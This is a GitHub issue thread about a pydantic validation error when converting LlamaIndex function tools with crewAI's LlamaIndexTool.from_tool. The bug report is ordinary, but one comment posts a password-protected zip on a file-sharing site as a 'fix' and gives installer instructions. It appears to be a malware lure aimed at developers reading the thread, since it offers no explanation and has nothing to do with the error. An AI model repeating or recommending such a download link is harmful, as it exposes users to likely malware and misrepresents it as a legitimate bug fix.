### ISSUE TITLE
[BUG] LlamaIndexTool from tool function is causing failure as 1 validation error for LlamaIndexTool.

### ISSUE THREAD

**Issue by techthiyanes** [crewAIInc/crewAI#1262]
### Description

Unable to create crewai tool from LlamaIndexTool from tool function.

Please find below error trace:

ValidationError                           Traceback (most recent call last)
[<ipython-input-5-274ead7be2d4>](https://localhost:8080/#) in <cell line: 1>()
----> 1 crewai_wolfram_tools = [LlamaIndexTool.from_tool(t) for t in wolfram_tools]

2 frames
[/usr/local/lib/python3.10/dist-packages/pydantic/main.py](https://localhost:8080/#) in __init__(self, **data)
    191         # `__tracebackhide__` tells pytest and some other tools to omit this function from tracebacks
    192         __tracebackhide__ = True
--> 193         self.__pydantic_validator__.validate_python(data, self_instance=self)
    194 
    195     # The following line sets a flag that we use to determine when `__init__` gets overridden by the user

ValidationError: 1 validation error for LlamaIndexTool
args_schema
  Input should be a subclass of BaseModel [type=is_subclass_of, input_value=<class 'llama_index.core....ls.wolfram_alpha_query'>, input_type=ModelMetaclass]
    For further information visit https://errors.pydantic.dev/2.8/v/is_subclass_of

### Steps to Reproduce

Create a Llama index tool from function tool.
Then covert it to creaw ai tool function call from llamaindextool.from_tool()

### Expected behavior

Crewai tool function should be created

### Screenshots/Code snippets

crewai_wolfram_tools = [LlamaIndexTool.from_tool(t) for t in wolfram_tools]

### Operating System

Other (specify in additional context)

### Python Version

3.10

### crewAI Version

crewai-0.51.1 crewai-tools-0.8.3 

### crewAI Tools Version

crewai-0.51.1 crewai-tools-0.8.3 

### Virtual Environment

Venv

### Evidence

Error stack trace

### Possible Solution

NA

### Additional context

NA

**Comment by Gaurav9812** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by joaomdmoura** [comment]
cc future @bhancockio after the flows UI
